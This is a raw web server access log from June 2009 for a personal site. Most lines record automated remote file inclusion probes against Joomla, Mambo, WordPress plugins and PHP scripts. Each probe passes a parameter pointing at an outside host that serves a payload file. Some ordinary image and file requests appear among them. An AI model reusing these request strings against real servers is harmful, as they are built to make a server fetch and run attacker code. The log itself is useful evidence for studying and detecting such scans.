83.98.209.71 - - [21/Jun/2009:12:24:03 -0700] "GET /logs/access_080816.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:24:03 -0700] "GET /logs/index.php.strona?=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:24:03 -0700] "GET /logs/access_090528.log/index.php.strona?=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:24:05 -0700] "GET /logs/access_080228.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:24:05 -0700] "GET /logs/index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:24:05 -0700] "GET /logs/access_081123.log%20%20/index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:24:05 -0700] "GET /index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:24:05 -0700] "GET /logs/access_080326.log%20%20/index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:24:11 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:24:11 -0700] "GET /logs/access_090423.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:24:18 -0700] "GET /logs/access_081226.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:24:55 -0700] "GET /index.php.strona?=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 7977 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:12:24:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:24:58 -0700] "GET /logs/access_090528.log%20%20/index.php.strona?=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:25:09 -0700] "GET /logs/access_090323.log%20%20/index.php.strona?=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:25:09 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20920 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:12:25:13 -0700] "GET /logs/access_081026.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:12:25:13 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:12:25:13 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:12:25:21 -0700] "GET /logs/access_080906.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:12:25:31 -0700] "GET /logs/access_080222.log//?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:12:25:32 -0700] "GET /?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 20994 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:12:25:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 105055 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:12:25:33 -0700] "GET /logs/access_080222.log//?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:12:25:34 -0700] "GET /?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 20994 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:12:25:35 -0700] "GET /logs//?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 105055 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:12:26:18 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.203.180.144 - - [21/Jun/2009:12:26:20 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:26:52 -0700] "GET /logs/access_081226.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:27:24 -0700] "GET /logs/access_090528.log/index.php.strona?=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:27:24 -0700] "GET /logs/index.php.strona?=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:27:31 -0700] "GET /logs/access_090528.log/index.php.strona?=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:27:32 -0700] "GET /logs/index.php.strona?=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_8.jpg HTTP/1.1" 200 33710 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_4.jpg HTTP/1.1" 200 30204 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_5.jpg HTTP/1.1" 200 36788 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_9.jpg HTTP/1.1" 200 43994 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_33.jpg HTTP/1.1" 200 57210 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_6.jpg HTTP/1.1" 200 43164 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_7.jpg HTTP/1.1" 200 37670 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_31.jpg HTTP/1.1" 200 34412 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_32.jpg HTTP/1.1" 200 45744 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_30.jpg HTTP/1.1" 200 36022 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_3.jpg HTTP/1.1" 200 21490 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_29.jpg HTTP/1.1" 200 14396 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_28.jpg HTTP/1.1" 200 30909 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_27.jpg HTTP/1.1" 200 47213 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:27:33 -0700] "GET /bikes/dteel/EQ2/EQ2_26.jpg HTTP/1.1" 200 34440 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:27:34 -0700] "GET /logs/access_090323.log/index.php.strona?=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.150.107.30 - - [21/Jun/2009:12:27:34 -0700] "GET /logs/access_090303.log//ckshop.php?incdir=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.107.30 - - [21/Jun/2009:12:27:34 -0700] "GET /ckshop.php?incdir=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.107.30 - - [21/Jun/2009:12:27:34 -0700] "GET /logs//ckshop.php?incdir=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.107.30 - - [21/Jun/2009:12:27:38 -0700] "GET /logs/access_090316.log//ckshop.php?incdir=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:27:48 -0700] "GET /logs/access_090323.log/index.php.strona?=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:12:27:48 -0700] "GET /logs/access_081026.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [21/Jun/2009:12:27:48 -0700] "GET /logs/access_080906.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/fucku4/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.220.223.94 - - [21/Jun/2009:12:28:02 -0700] "GET /bikes/dteel/EQ2/Fraaxia_thumb.jpg HTTP/1.1" 200 26169 "http://gotla.guildportal.com/Guild.aspx?GuildID=80731&ForumID=375139&PostCount=5&TabID=695682&TopicID=8305265&Page=1" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; .NET CLR 3.0.30729)" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:28:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:28:14 -0700] "GET /index.php.strona?=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 7977 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
218.246.20.221 - - [21/Jun/2009:12:28:34 -0700] "GET /logs/access_090204.log///?_SERVER[DOCUMENT_ROOT]=http://www.walji-co.com/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [21/Jun/2009:12:28:34 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.walji-co.com/id.txt??? HTTP/1.1" 200 105056 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:28:43 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:28:43 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:28:43 -0700] "GET /logs/access_080410.log//modules/agendax/addevent.inc.php?agendax_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:28:43 -0700] "GET /logs/access_080408.log//modules/agendax/addevent.inc.php?agendax_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:29:06 -0700] "GET /index.php.strona?=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 7977 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:12:29:06 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.246.20.221 - - [21/Jun/2009:12:29:21 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.walji-co.com/id.txt??? HTTP/1.1" 200 20997 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:29:25 -0700] "GET /logs/access_080718.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:29:30 -0700] "GET /logs/access_090523.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:29:41 -0700] "GET /logs/access_080516.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:29:42 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:12:29:43 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.41 - - [21/Jun/2009:12:29:43 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:29:43 -0700] "GET /logs/access_080423.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:29:45 -0700] "GET /logs/access_090405.log%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:29:57 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20916 "-" "Mozilla/5.0" "www.dmulk.com"
200.54.154.10 - - [21/Jun/2009:12:30:24 -0700] "GET /logs/access_080831.log/?sourcedir=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:30:32 -0700] "GET /logs/access_090328.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:30:37 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:31:23 -0700] "GET /logs/access_081016.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:31:23 -0700] "GET /logs/access_081029.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.107.30 - - [21/Jun/2009:12:31:56 -0700] "GET /logs/access_090303.log%20%20//ckshop.php?incdir=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.107.30 - - [21/Jun/2009:12:31:56 -0700] "GET /logs/access_090316.log%20%20//ckshop.php?incdir=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:32:01 -0700] "GET /logs/access_090423.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:32:04 -0700] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:32:04 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [21/Jun/2009:12:32:11 -0700] "GET /logs/access_081026.log%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:32:21 -0700] "GET /logs/access_081226.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:32:21 -0700] "GET /logs/access_090423.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:32:37 -0700] "GET /logs/access_081226.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:33:24 -0700] "GET /logs/access_080314.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:33:30 -0700] "GET /includes/search.php?GlobalSettings[templatesDirectory]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:33:30 -0700] "GET /logs/includes/search.php?GlobalSettings[templatesDirectory]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:33:30 -0700] "GET /logs/access_071216.log%20%20/includes/search.php?GlobalSettings[templatesDirectory]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [21/Jun/2009:12:33:36 -0700] "GET /logs/access_080412.log%20%20/includes/search.php?GlobalSettings[templatesDirectory]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.139.67.116 - - [21/Jun/2009:12:33:45 -0700] "GET /logs/access_090426.log/index.php.strona?=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:34:09 -0700] "GET /logs/access_081029.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:34:09 -0700] "GET /logs/access_081016.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
